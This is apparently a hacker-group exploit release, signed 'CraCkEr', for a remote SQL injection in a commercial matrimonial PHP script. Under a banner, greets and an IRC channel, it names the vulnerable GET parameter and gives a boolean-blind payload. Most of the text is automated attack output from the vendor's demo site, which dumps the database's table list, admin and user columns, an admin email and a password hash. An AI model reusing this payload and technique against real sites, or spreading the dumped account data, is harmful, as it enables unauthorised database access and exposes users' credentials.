┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr │ │ :
│ Website : uisort.com │ │ │
│ Vendor : Uisort Technologies Pvt. Ltd. │ │ │
│ Software : Matrimonial PHP Script v1.0 │ │ Matrimonial Script PHP tailored with │
│ Demo : stage.matrimic.in │ │ advanced features website │
│ Vuln Type: Remote SQL Injection │ │ & mobile apps from matrimic │
│ Method : GET │ │ │
│ Impact : Database Access │ │ │
│ │ │ │
│────────────────────────────────────────────┘ └─────────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y
CryptoJob (Twitter) twitter.com/CryptozJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
GET parameter 'Userdetails[ud_gender]' is vulnerable
---
Parameter: Userdetails[ud_gender] (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Userdetails[ud_gender]=1 AND 2636=2636
---
[+] Starting the Attack
[INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[INFO] fetching current database
[INFO] retrieved: stage_db_qa
[INFO] fetching number of tables for database 'stage_db_qa'
Database: stage_db_qa
[37 tables]
+--------------------+
| YiiCache |
| YiiLog |
| mc_admin |
| mc_blocklist |
| mc_caste |
| mc_city |
| mc_cms |
| mc_contact |
| mc_contact_history |
| mc_country |
| mc_currency |
| mc_deleteprofile |
| mc_education |
| mc_feedback |
| mc_gallery |
| mc_height |
| mc_horoscope |
| mc_import_jobs |
| mc_interest |
| mc_language |
| mc_message |
| mc_occupation |
| mc_partner |
| mc_plan |
| mc_profile_viewed |
| mc_religion |
| mc_searchlist |
| mc_settings |
| mc_shortlist |
| mc_sms_history |
| mc_state |
| mc_subcaste |
| mc_success_story |
| mc_toungue |
| mc_transaction |
| mc_user |
| mc_userdetails |
+--------------------+
[INFO] fetching columns for table 'mc_admin' in database 'stage_db_qa'
Database: stage_db_qa
Table: mc_admin
[4 columns]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| admin_email | varchar(32) |
| admin_id | int(11) |
| admin_name | varchar(32) |
| admin_status | int(11) |
+--------------+-------------+
[INFO] fetching number of column(s) 'admin_email,admin_id,admin_name,admin_status' entries for table 'mc_admin' in database 'stage_db_qa'
Database: stage_db_qa
Table: mc_admin
[1 entry]
+----------+-----------------------+------------+--------------+
| admin_id | admin_email | admin_name | admin_status |
+----------+-----------------------+------------+--------------+
| 1 | admin@mat\x81imic.com | Admin | 1 |
+----------+-----------------------+------------+--------------+
[INFO] fetching columns for table 'mc_user' in database 'stage_db_qa'
Database: stage_db_qa
Table: mc_user
[20 columns]
+------------------------+--------------+
| Column | Type |
+------------------------+--------------+
| api_token | varchar(255) |
| code | varchar(128) |
| device | varchar(32) |
| user_activecode | varchar(32) |
| user_activedate | datetime |
| user_activestatus | int(11) |
| user_android_device_id | varchar(255) |
| user_email | varchar(32) |
| user_id | int(11) |
| user_ios_device_id | varchar(255) |
| user_ipaddress | varchar(32( |
| user_lastlogin | datetime |
| user_mobile | bigint(20) |
| user_opensource | varchar(32) |
| user_password | varchar(255) |
| user_salt | varchar(64) |
| user_status | int(11) |
| user_type | int(11) |
| user_userid | int(11) |
| user_verified_token | varchar(255) |
+------------------------+--------------+
[INFO] fetching number of column(s) 'user_email,user_id,user_password,user_type,user_userid' entries for table 'mc_user' in database 'stage_db_qa'
Database: stage_db_qa
Table: mc_user
[1 entry]
+---------+--------------------+------------------------------------------+-----------+-------------+
| user_id | user_email | user_password | user_type | user_userid |
+---------+--------------------+------------------------------------------+-----------+-------------+
| 1 | admin@matrimic.com | fa4c71db18591d0323141b39ab337b59b584b3b9 | 1 | 1 |
+---------+--------------------+------------------------------------------+-----------+-------------+
Possible Algorithms: SHA1
[-] Done